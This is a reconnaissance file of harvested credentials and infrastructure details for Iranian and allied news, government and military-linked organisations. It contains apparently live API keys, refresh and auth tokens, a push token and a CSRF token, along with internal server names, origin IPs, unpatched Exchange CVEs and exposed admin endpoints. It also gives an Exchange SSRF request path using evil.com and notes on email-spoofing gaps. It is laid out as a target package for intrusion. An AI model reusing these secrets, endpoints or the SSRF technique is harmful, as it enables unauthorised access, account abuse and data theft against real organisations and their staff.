# MASTER CREDENTIALS & INFRASTRUCTURE FILE
## Collected Feb 28, 2026 — Iranian & Proxy OSINT

---

## 1. IRGC FARS NEWS — Google Cloud / Firebase

| Property | Value |
|----------|-------|
| **GCP Project Name** | `fars-next` |
| **GCP Project Number** | `823560469881` |
| **Google API Key** | `AIzaSyDp9K7YksfYf-JvGOS7YCNv7JbA9P-XemE` |
| **API Key Restrictions** | **NONE** (unrestricted) |
| **Firebase App ID** | `1:823560469881:android:a2e494ac003a2969c383a8` |
| **GCM Sender ID** | `823560469881` |
| **Storage Bucket** | `fars-next.appspot.com` |
| **OAuth Client ID** | `823560469881-rqin08q6q2drg8aq740db4j34980t9cp.apps.googleusercontent.com` |

### Firebase Installation (registered device)

| Property | Value |
|----------|-------|
| **FID** | `fWHh5X5IsUmmdtGGLQOV9H` |
| **Refresh Token** | `3_AS3qfwIZEFw2_ld1jYfT_AO2834pt03vGFgh-zZeE0Emv1wp06DSnvealH7jYxeyY9TNVtQFeVUG_Ipor8-fuSmWmgpiIy-BD82seRpSSJ6jpsk` |
| **Auth JWT** | `eyJhbGciOiJFUzI1NiIsInR5cCI6IkpXVCJ9.eyJhcHBJZCI6IjE6ODIzNTYwNDY5ODgxOmFuZHJvaWQ6YTJlNDk0YWMwMDNhMjk2OWMzODNhOCIsImV4cCI6MTc3Mjg3NDg5MiwiZmlkIjoiZldIaDVYNUlzVW1tZHRHR0xRT1Y5SCIsInByb2plY3ROdW1iZXIiOjgyMzU2MDQ2OTg4MX0.AB2LPV8wRAIgc3ngJJmpf1gaFRW4YiOy-tuUExNOOvdqDLyuWuUzYO0CIAc8byn_O8Nae_2b5LXt-qWpfJWgxO_UXUwNie9cglPf` |
| **JWT Expiry** | 7 days (604800s) |

### FCM Push Token (receiving IRGC push notifications)

```
fWHh5X5IsUmmdtGGLQOV9H:APA91bGR8MteNn9o6dTbOtWRxVZoJsuNNN0hiNTZWo9sUnDTDWtR-mmXslzoE8IQif3aV06C8fFX792G7wq2DTA02gYlxPI_tlEZJLJG5jqIGmBLzMNzsUg
```

### GCM Device Registration

| Property | Value |
|----------|-------|
| **Android ID** | `4853801490421017489` |
| **Security Token** | `1176940086212703190` |

### GCP API Status

| API | Status |
|-----|--------|
| Firebase Installations | ACTIVE — accepts device registrations |
| Firebase Cloud Messaging | ACTIVE — push token registration works |
| Firebase Remote Config | ACTIVE — returns `NO_TEMPLATE` (empty) |
| Firebase Dynamic Links | ENABLED but not configured |
| Cloud Pub/Sub | ENABLED — returns 403 (active ACL) |
| Firebase App Check | DISABLED |
| Google Places (New) | DISABLED |
| Firebase Auth | NOT CONFIGURED |
| Firebase RTDB | NOT CONFIGURED |
| Cloud Firestore | NOT CONFIGURED |
| Firebase Storage | NOT CONFIGURED (bucket doesn't exist) |

### Developer Identity (from APK signing cert)

| Property | Value |
|----------|-------|
| **Organization** | TSIT |
| **Location** | Mashhad, Khorasan Razavi, Iran |
| **Dev Machine** | DESKTOP-CV5TMVD |
| **Dev Username** | MQT |
| **Cert Date** | 2024-12-23 |
| **APK Package** | `ir.farsnews.next` (internal: `com.microblog.app`) |
| **WebView Debug** | ENABLED in production |
| **Cleartext Traffic** | ALLOWED |

### Fars News Internal Subdomains (all DOWN — Iran blackout)

| Subdomain | Purpose |
|-----------|---------|
| `jira.farsnews.ir` | Jira project management |
| `confluence.farsnews.ir` | Atlassian wiki |
| `chat.farsnews.ir` | Internal messaging |
| `my-api-tlg.farsnews.ir` | Telegram bot API |
| `matomo.farsnews.ir` | Self-hosted analytics |
| `faculty.farsnews.ir` | Personnel directory |
| `evaluation.farsnews.ir` | Staff evaluation |
| `mail.farsnews.ir` | Email |
| `media.farsnews.ir` | Media server |
| `tracker.farsnews.ir` | Tracking |
| `stat.farsnews.ir` | Statistics |
| `robot.farsnews.ir` | Automation |

### Fars News API Auth Headers

```
X-Token          — Auth token
APPVERSION       — App version
X-RFID           — Request fingerprint
X-VERSION        — Version header
duid             — Device unique ID
platform         — Client platform
os               — Operating system
app-market       — App store variant
app-scope        — Multi-tenant scope
app-scope-tenant — Tenant ID
Server: "ninja"  — Nginx fork
```

---

## 2. AL MAYADEEN — Exchange / Active Directory

### AD Domain & Servers

| Property | Value |
|----------|-------|
| **AD Domain** | `ITTIHADTV.LOCAL` |
| **AD Forest** | `ITTIHADTV.local` (single-forest) |
| **NetBIOS Domain** | `ITTIHADTV` |
| **Login Format** | `ITTIHADTV\username` |
| **Exchange Version** | 2016 CU23 |
| **Build** | `15.1.2507.59` (Sep25HU, Sep 8 2025) |
| **IIS Version** | 8.5 |
| **ASP.NET Version** | 4.0.30319 |
| **OS** | Windows Server 2012 R2 (EOL Oct 2023) |
| **Patches Behind** | 3 (Oct25SU, Dec25SU, Feb26SU) |
| **Federation Realm** | `almayadeen.net` |
| **Auth Cert Thumbprint** | `B2BBL_9jBZevT87C3_XGGbydTjY` |
| **Auth Cert Expiry** | 2027-01-03 |

### Exchange Servers (7 confirmed)

| Server | Role | IP | Notes |
|--------|------|-----|-------|
| **BHS-EX09** | Frontend CAS | 89.249.221.252 | Primary, internet-facing, **no Cloudflare** |
| **BHS-EX08** | Frontend CAS | 80.81.152.37 | Secondary, internet-facing, **no Cloudflare** |
| **BHS-EX01** | Backend DAG | — | EWS, MAPI/EMSMDB |
| **BHS-EX02** | Backend DAG | — | MAPI/NSPI, ECP, PowerShell, RPC, ActiveSync |
| **BHS-EX03** | Backend DAG | — | OAB, OWA, EWS, MAPI/NSPI, RPC, ECP, ActiveSync |
| **BHS-EX04** | Backend DAG | — | EWS, MAPI/NSPI, OAB, RPC, MAPI/EMSMDB, PowerShell, OWA |
| **BHS-EX05** | Backend DAG | — | ActiveSync, MAPI/EMSMDB, ECP, Federation (port 444) |
| BHS-EX06 | Unknown | — | NOT SEEN in 20+ rounds |
| BHS-EX07 | Unknown | — | NOT SEEN in 20+ rounds |

### Unpatched CVEs

| CVE | Type | CVSS | Fixed In |
|-----|------|------|----------|
| CVE-2025-59249 | Elevation of Privilege | **8.8** | Oct25SU (.61) |
| CVE-2025-53782 | Elevation of Privilege | **7.8–8.4** | Oct25SU (.61) |
| CVE-2025-59248 | Spoofing | — | Oct25SU (.61) |
| CVE-2025-64666 | Elevation of Privilege | — | Dec25SU (.63) |
| CVE-2025-64667 | Spoofing | — | Dec25SU (.63) |
| CVE-2026-21527 | Spoofing (no auth) | **6.5** | Feb26SU (.66) |

### Exchange Endpoints (all publicly accessible)

| Endpoint | URL |
|----------|-----|
| OWA (Webmail) | `https://autodiscover.almayadeen.net/owa/auth/logon.aspx` |
| ECP (Admin) | `https://autodiscover.almayadeen.net/ecp/` |
| EWS | `https://autodiscover.almayadeen.net/ews/exchange.asmx` |
| MAPI | `https://autodiscover.almayadeen.net/mapi/` |
| RPC | `https://autodiscover.almayadeen.net/rpc/rpcproxy.dll` |
| ActiveSync | `https://autodiscover.almayadeen.net/Microsoft-Server-ActiveSync` |
| PowerShell | `https://autodiscover.almayadeen.net/powershell` |
| MRS Proxy | `https://autodiscover.almayadeen.net/ews/mrsproxy.svc` |
| OAB | `https://autodiscover.almayadeen.net/OAB/` |
| Healthcheck | `https://autodiscover.almayadeen.net/owa/healthcheck.htm` |
| Autodiscover JSON | `https://autodiscover.almayadeen.net/autodiscover/autodiscover.json` |
| Federation Metadata | `https://autodiscover.almayadeen.net/autodiscover/metadata/json/1` |

### OWA Login Reason Codes

| Code | Meaning |
|------|---------|
| `reason=0` | No error |
| `reason=1` | Session timeout |
| `reason=2` | Invalid credentials |
| `reason=3` | Account locked |

### SSRF Path (leaks backend servers)

```
/autodiscover/autodiscover.json?@evil.com/{service}/?&Email=autodiscover/autodiscover.json%3F@evil.com

Leaked headers:
  X-CalculatedBETarget: bhs-exNN.ittihadtv.local
  X-DiagInfo: BHS-EXNN
  X-BEServer: BHS-EXNN
  X-FEServer: BHS-EX09
  X-OWA-Version: 15.1.2507.59
  X-WSSecurity-Enabled: True
  X-OAuth-Enabled: True
```

### Auth Protocols Enabled

| Protocol | Status |
|----------|--------|
| NTLM | Enabled (EWS, MAPI, RPC) |
| Negotiate (Kerberos) | Enabled |
| Basic Auth | Enabled (ActiveSync) |
| WS-Security | Enabled (MRS Proxy) |
| OAuth | Enabled (MRS Proxy, Federation) |

---

## 3. AL MAYADEEN — Network / IPs

### Origin IPs (from SPF + DNS)

| IP | Role | Cloudflare | Server |
|----|------|------------|--------|
| `80.81.152.37` | Mail (secondary) | **NO** | BHS-EX08 |
| `80.81.152.41` | Web origin | Yes | — |
| `89.249.221.244` | Web + MX3 | Yes (web) | — |
| `89.249.221.245` | FTP | — | Unreachable |
| `89.249.221.252` | Mail (primary) | **NO** | BHS-EX09 |
| `194.126.9.230` | MX1 relay | — | — |

### Email Security

| Check | Value | Risk |
|-------|-------|------|
| SPF | `v=spf1 a mx ip4:80.81.152.41 ip4:89.249.221.244 -all` | Leaks origin IPs |
| DMARC | `v=DMARC1; p=none` | **No enforcement — spoofing possible** |
| DKIM | NOT CONFIGURED | **No email signing** |

---

## 4. AL MAYADEEN — CMS / Web Platform

### MangoX CMS

| Property | Value |
|----------|-------|
| **Framework** | ASP.NET Core |
| **Subscription Code** | `mangopulse` |
| **Post Type Code** | `article` |
| **Auth Endpoint** | `POST /api/auth/login` |
| **Auth Format** | `{"UserName":"X","Password":"X"}` |
| **Token Type** | Bearer JWT |
| **Upload Endpoint** | `POST /media/Upload?subscriptionCode=mangopulse` |
| **Developer** | M3almi KING Kassem |

### Azure OpenAI

| Property | Value |
|----------|-------|
| **API URL** | `https://mdn-open-ai.openai.azure.com` |
| **Deployment** | `mdn-gpt-4` |
| **API Version** | `2024-05-01-preview` |
| **API Key** | Server-side injected (not in client) |

### Docker Containers (6)

| Container ID | Subdomain | Environment |
|-------------|-----------|-------------|
| `94a743b785f9` | portal-api.almayadeen.net | Production |
| `57660472686f` | portal-beta-api.almayadeen.net | Production |
| `cd4b3868f98b` | public-api.almayadeen.net | Production |
| `63d26ec15c1d` | portal-staging-api.almayadeen.net | Staging |
| `0314cab697ec` | public-api-staging.almayadeen.net | Staging |
| `5b0c704d44be` | public-api-beta.almayadeen.net | Beta |

### Admin Panel

| Property | Value |
|----------|-------|
| **Login URL** | `https://alpha-ar-admin.almayadeen.net/Account/logon` |
| **English Admin** | `https://alpha-en-admin.almayadeen.net/Account/logon` |
| **Framework** | ASP.NET Core |
| **CSRF Format** | `CfDJ8...` (ASP.NET Core Data Protection) |
| **Theme Builder** | `/Manage/Designer/OpenThemeBuilder/1424017` |

### Verification Tokens

| Service | Token |
|---------|-------|
| loader.io | `e26421201d5e0b60d1522ebe1a7c770f` |
| Google Verification 1 | `9ccXUvjKiv9Reva0HD4QNVTFHO6SidPD7-Z7KRt3gqU` |
| Google Verification 2 | `PNUy--Lzy6bkRJcScDS9HvytsuwjhHETuiYIXUAMDPU` |
| Google Verification 3 | `QTUyXVxdcLNuugOu2W47Y2iST1MJpmNa8loe7p7FwIk` |

### .env Files

All subdomains have `.env` files — blocked by Cloudflare WAF (403, 4836 bytes):
- `portal-api.almayadeen.net/.env`
- `alpha-ar-admin.almayadeen.net/.env`
- `interactions.almayadeen.net/.env`
- `ai.almayadeen.net/.env`

### MangoPulse Platform

| Subdomain | Status |
|-----------|--------|
| docs.mangopulse.net | CMS login portal (`/home/login`) |
| search-api.mangopulse.net | Self-documenting API |
| media-ar.mangopulse.net | Arabic media CDN |
| cp.mangopulse.net | Control panel (308 redirect loop) |
| tracking-api.mangopulse.net | Timeout (internal only) |
| data-platform.mangopulse.net | Timeout (internal only) |
| grafana.mangopulse.net | Timeout (internal only) |
| sentry.mangopulse.net | Timeout (internal only) |
| n8n.mangopulse.net | Timeout (internal only) |

### URL Shortener (mdn.tv)

| Property | Value |
|----------|-------|
| English | `en.mdn.tv` |
| Spanish | `es.mdn.tv` |
| CORS | `*` (wide open) |

### Subdomains — Al Mayadeen (40 via crt.sh)

**LIVE (14):** almayadeen.net, portal-api, portal-beta-api, portal-staging-api, public-api, public-api-staging, public-api-beta, portal, ai, interactions, media, next-ar, next-en, autodiscover

**ADMIN (3):** alpha-ar-admin, alpha-en-admin, admin

**MEDIA CDN (3):** alpha-ar-media, alpha-en-media, alpha-fr-media

**HIJACKED:** corona-form (→ nswpaintings.com.au)

**ABANDONED:** react (Vercel 402)

---

## 5. HEZBOLLAH — Al Manar

| Property | Value |
|----------|-------|
| **cPanel Username** | `manarnet` |
| **Server Path** | `/home/manarnet/public_html/` |
| **WordPress** | 6.7.0 |
| **Security Plugin** | hide_my_wp |
| **Debug Plugin** | debug-bar |
| **Theme** | ar-manar |
| **Debug Log** | `https://almanar.com.lb/wp-content/debug.log` (102KB, LIVE) |

### LimeSurvey

| Property | Value |
|----------|-------|
| **URL** | `https://survey.almanar.com.lb/index.php/admin/authentication/sa/login` |
| **Platform** | LimeSurvey (Yii framework) |
| **Server** | Apache |
| **Session Cookie** | `LS-UYWLGYJFYCLTSXMF` |

### Archive API

| Property | Value |
|----------|-------|
| **URL** | `https://archive.almanar.com.lb/api` |
| **Methods** | `programs/`, `live/`, `programs_list/` |
| **Error Format** | `Unknown method 'X'` |

### Alahednews (.git exposed)

| Property | Value |
|----------|-------|
| **URL** | `https://english.alahednews.news/.git/` |
| **Status** | 403 (protected but directory EXISTS) |

### Moqawama.org (military wing)

| Property | Value |
|----------|-------|
| **Hosting** | Amazon S3 |
| **CDN** | Amazon CloudFront (ATL59-P18, Atlanta) |

---

## 6. KHAMENEI — Supreme Leader

### Live Endpoints

| URL | Status | Notes |
|-----|--------|-------|
| `https://formx.khamenei.link/farsi-json/topticker` | **LIVE** | Hidden API, redirect tracking |
| `https://nojavan.khamenei.ir` | **LIVE** | Youth portal (43KB) |
| `https://admin.english.khamenei.ir` | HTTP 445 | Custom security middleware |
| `https://virastar.nojavan.khamenei.ir` | HTTP 445 | Youth editor portal |
| `https://idc0-cdn0.khamenei.ir` | LIVE | CDN (612B nginx) |
| `https://idc0-cdn1.khamenei.ir` | LIVE | CDN (612B nginx) |

### Tracking Format

```
redirect?id=XXXXX&c=HASH&u=TARGET_URL
```

### khamenei.link Subdomains

| Subdomain | Purpose |
|-----------|---------|
| formx | API (LIVE) |
| lms | Learning Management System |
| mail | Email |
| smtp | SMTP |
| pop | POP3 |
| vconf | Video conferencing |
| dars | Lessons |
| sabtenam | Registration |
| stat | Statistics |
| cloudx | Cloud services |
| live-app / liveapp | Live streaming app |
| publicataasset | Public asset CDN |

---

## 7. SANA.SY — Syrian Arab News Agency

| Property | Value |
|----------|-------|
| **WordPress** | 6.9 |
| **SEO Plugin** | Rank Math PRO |
| **CDN** | cdn.sananews.sy |
| **XML-RPC** | ACTIVE (80+ methods) |
| **REST API** | DISABLED |

### Webmail (Roundcube)

| Property | Value |
|----------|-------|
| **URL** | `https://webmail.sana.sy/` |
| **Platform** | Roundcube on Plesk Premium Email / Kolab |
| **Build** | 10612 |
| **CSRF Token** | `lT6lwnmtg57m2Qm571yirCZFGLD68n1P` |
| **Session Lifetime** | 10,800s (3 hours) |
| **Cookie Domain** | `webmail.sana.sy` |

### Social Media

| Platform | URL |
|----------|-----|
| Facebook | `https://www.facebook.com/sana.gov/` |
| Twitter/X | `https://x.com/Sana__gov` |
| YouTube | `https://www.youtube.com/syrianarabnewsagency-sana` |
| Instagram | `https://www.instagram.com/sana__gov/` |
| Telegram | `https://t.me/sana_gov` |
| WhatsApp | `https://whatsapp.com/channel/0029Vb5QI6jIyPtUjKcQQz3O` |

---

## 8. IRAN DEFENSE MARKETPLACE (mindex-center.ir)

| Property | Value |
|----------|-------|
| **Framework** | Laravel (PHP) |
| **API Gateway** | Kong 3.8.0 |
| **CDN** | ArvanCloud |
| **Session Cookie** | `mindex_session` |
| **CSRF** | `XSRF-TOKEN` (Laravel) |
| **Session Timeout** | 7,200s (2 hours) |

---

## 9. IRAN SPACE AGENCY (space.ir)

| Property | Value |
|----------|-------|
| **CMS** | WordPress (REST API fully open) |
| **API Root** | `https://space.ir/wp-json/` (2.49 MB schema) |
| **Total Data Extracted** | 6.1 MB (posts, pages, media, categories, taxonomies, users) |
| **Users Endpoint** | Returns user data (292 B) |

---

## 10. IFP NEWS (ifpnews.com)

| Property | Value |
|----------|-------|
| **CMS** | WordPress (REST API open) |
| **API Root** | `https://ifpnews.com/wp-json/` (266 KB schema) |
| **Posts** | 23 KB extracted |

---

*Generated: Feb 28, 2026*
*Source files: 17 files in credentials/*
